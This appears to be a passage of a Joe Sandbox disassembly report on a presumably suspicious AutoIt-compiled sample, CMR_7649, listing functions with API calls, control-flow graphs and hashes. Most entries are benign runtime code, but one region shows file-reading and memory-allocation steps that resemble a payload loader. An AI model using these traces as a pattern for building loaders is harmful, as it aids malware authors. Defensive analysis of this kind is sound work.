                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __fread_nolock$_fseek_wcscpy
                                                • String ID: FILE
                                                • API String ID: 3888824918-3121273764
                                                • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                • ImageList_ReplaceIcon.COMCTL32(00AFD7D8,000000FF,00000000), ref: 00410552
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                • RegisterClassExW.USER32(?), ref: 0041045D
                                                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AFD7D8,000000FF,00000000), ref: 00410552
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _malloc
                                                • String ID: Default
                                                • API String ID: 1579825452-753088835
                                                • Opcode ID: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                • Opcode Fuzzy Hash: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1974 40f679-40f67c 1969->1974 1971 40f640 1970->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1969 1977->1971 1990 425d43-425d5f call 414d30 1978->1990 1979->1975 1981 40f6b4-40f6c2 1980->1981 1982 40f6af-40f6b2 1980->1982 1984 425d16 1981->1984 1985 40f6c8-40f6d6 1981->1985 1982->1975 1984->1978 1987 425d05-425d0b 1985->1987 1988 40f6dc-40f6df 1985->1988 1987->1973 1991 425d11 1987->1991 1988->1975 1990->1968 1991->1984
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_fseek_memmove_strcat
                                                • String ID: AU3!$EA06
                                                • API String ID: 1268643489-2658333250
                                                • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2005 42b038-42b03f 2001->2005 2009 401193-40119a 2002->2009 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2008 42b045-42b059 call 401000 call 40e0c0 2005->2008 2012 401219-40121f 2006->2012 2013 40115d 2006->2013 2010 4011a3-4011a9 2007->2010 2011 42afb4-42afc5 call 40f190 2007->2011 2008->2000 2010->2001 2019 4011af 2010->2019 2011->2009 2012->2001 2016 401225-42b06d call 468b0e 2012->2016 2014 401163-401166 2013->2014 2015 42b01d-42b024 2013->2015 2020 42afe9-42b018 call 40f190 call 401a50 2014->2020 2021 40116c-401172 2014->2021 2015->2000 2027 42b02a-42b033 call 4370f4 2015->2027 2016->2009 2019->2001 2025 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2019->2025 2026 4011db-401202 SetTimer RegisterWindowMessageW 2019->2026 2020->2000 2021->2001 2029 401174-42afde call 45fd57 2021->2029 2026->2009 2034 401204-401216 CreatePopupMenu 2026->2034 2027->2000 2029->2000 2045 42afe4 2029->2045 2045->2009
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                • CreatePopupMenu.USER32 ref: 00401204
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                APIs
                                                • _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • std::exception::exception.LIBCMT ref: 00411626
                                                • std::exception::exception.LIBCMT ref: 00411640
                                                • __CxxThrowException@8.LIBCMT ref: 00411651
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                • String ID: ,*H$4*H$@fI
                                                • API String ID: 615853336-1459471987
                                                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                Function 03EDE610 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2065 3ede610-3ede6be call 3edc010 2068 3ede6c5-3ede6eb call 3edf520 CreateFileW 2065->2068 2071 3ede6ed 2068->2071 2072 3ede6f2-3ede702 2068->2072 2073 3ede83d-3ede841 2071->2073 2079 3ede709-3ede723 VirtualAlloc 2072->2079 2080 3ede704 2072->2080 2074 3ede883-3ede886 2073->2074 2075 3ede843-3ede847 2073->2075 2081 3ede889-3ede890 2074->2081 2077 3ede849-3ede84c 2075->2077 2078 3ede853-3ede857 2075->2078 2077->2078 2082 3ede859-3ede863 2078->2082 2083 3ede867-3ede86b 2078->2083 2084 3ede72a-3ede741 ReadFile 2079->2084 2085 3ede725 2079->2085 2080->2073 2086 3ede8e5-3ede8fa 2081->2086 2087 3ede892-3ede89d 2081->2087 2082->2083 2090 3ede86d-3ede877 2083->2090 2091 3ede87b 2083->2091 2092 3ede748-3ede788 VirtualAlloc 2084->2092 2093 3ede743 2084->2093 2085->2073 2088 3ede8fc-3ede907 VirtualFree 2086->2088 2089 3ede90a-3ede912 2086->2089 2094 3ede89f 2087->2094 2095 3ede8a1-3ede8ad 2087->2095 2088->2089 2090->2091 2091->2074 2098 3ede78f-3ede7aa call 3edf770 2092->2098 2099 3ede78a 2092->2099 2093->2073 2094->2086 2096 3ede8af-3ede8bf 2095->2096 2097 3ede8c1-3ede8cd 2095->2097 2101 3ede8e3 2096->2101 2102 3ede8cf-3ede8d8 2097->2102 2103 3ede8da-3ede8e0 2097->2103 2105 3ede7b5-3ede7bf 2098->2105 2099->2073 2101->2081 2102->2101 2103->2101 2106 3ede7c1-3ede7f0 call 3edf770 2105->2106 2107 3ede7f2-3ede806 call 3edf580 2105->2107 2106->2105 2113 3ede808 2107->2113 2114 3ede80a-3ede80e 2107->2114 2113->2073 2115 3ede81a-3ede81e 2114->2115 2116 3ede810-3ede814 CloseHandle 2114->2116 2117 3ede82e-3ede837 2115->2117 2118 3ede820-3ede82b VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03EDE6E1
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03EDE907
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1698859580.0000000003EDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3edc000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                • Instruction ID: de2eb3e16bcab45c33085c8f2761dc2103827a399bc24091e53215b74b0eab34
                                                • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                • Instruction Fuzzy Hash: 47A11C74E00209EBDB14CFA4C898BEEB7B5FF88304F149259E515BB280D7759A41CF94
                                                Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2119 401250-40125c 2120 401262-401293 call 412f40 call 401b80 2119->2120 2121 4012e8-4012ed 2119->2121 2126 4012d1-4012e2 KillTimer SetTimer 2120->2126 2127 401295-4012b5 2120->2127 2126->2121 2128 4012bb-4012bf 2127->2128 2129 4272ec-4272f2 2127->2129 2132 4012c5-4012cb 2128->2132 2133 42733f-427346 2128->2133 2130 4272f4-427315 Shell_NotifyIconW 2129->2130 2131 42731a-42733a Shell_NotifyIconW 2129->2131 2130->2126 2131->2126 2132->2126 2134 427393-4273b4 Shell_NotifyIconW 2132->2134 2135 427348-427369 Shell_NotifyIconW 2133->2135 2136 42736e-42738e Shell_NotifyIconW 2133->2136 2134->2126 2135->2126 2136->2126
                                                APIs
                                                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 3300667738-0
                                                • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2137 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2140 427190-4271ae RegQueryValueExW 2137->2140 2141 40e4eb-40e4f0 2137->2141 2142 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2140->2142 2143 42721a-42722a RegCloseKey 2140->2143 2148 427210-427219 call 436508 2142->2148 2149 4271f7-42720e call 402160 2142->2149 2148->2143 2149->2148
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                • API String ID: 1586453840-614718249
                                                • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2154 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
